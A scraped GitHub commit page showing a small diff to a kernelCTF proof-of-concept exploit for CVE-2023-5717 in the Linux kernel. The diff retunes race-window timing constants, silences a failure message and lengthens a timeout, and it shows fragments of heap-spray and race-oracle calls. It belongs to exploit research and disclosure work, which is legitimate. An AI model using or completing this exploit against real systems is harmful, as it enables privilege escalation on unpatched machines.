We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 9ed304d commit 616106bCopy full SHA for 616106b
pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit
-32 Bytes
pocs/linux/kernelctf/CVE-2023-5717_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c
@@ -27,8 +27,8 @@
27
#include <time.h>
28
#include <signal.h>
29
30
-#define MIN 62000
31
-#define MAX 74000
+#define MIN 60000
+#define MAX 75000
32
33
#define SIBLINGS_MAX 1024 // about 0x4000 ~
34
#define CPU_A 1 // main cpu
@@ -650,7 +650,7 @@ void exploit(){
650
exit(EXIT_FAILURE);
651
}
652
// place holder
653
- puts("[-] Race Failure");
+ // puts("[-] Race Failure");
654
655
656
@@ -665,7 +665,7 @@ int main(void) {
665
set_max_fd_limit();
666
tfd = timerfd_create(CLOCK_MONOTONIC, 0);
667
do_epoll_enqueue(tfd);
668
- alarm(60*10);
+ alarm(60*40);
669
race_oracle();
670
spray_xattr_page(0x3000, 2048, 0);
671
exploit();
0 commit comments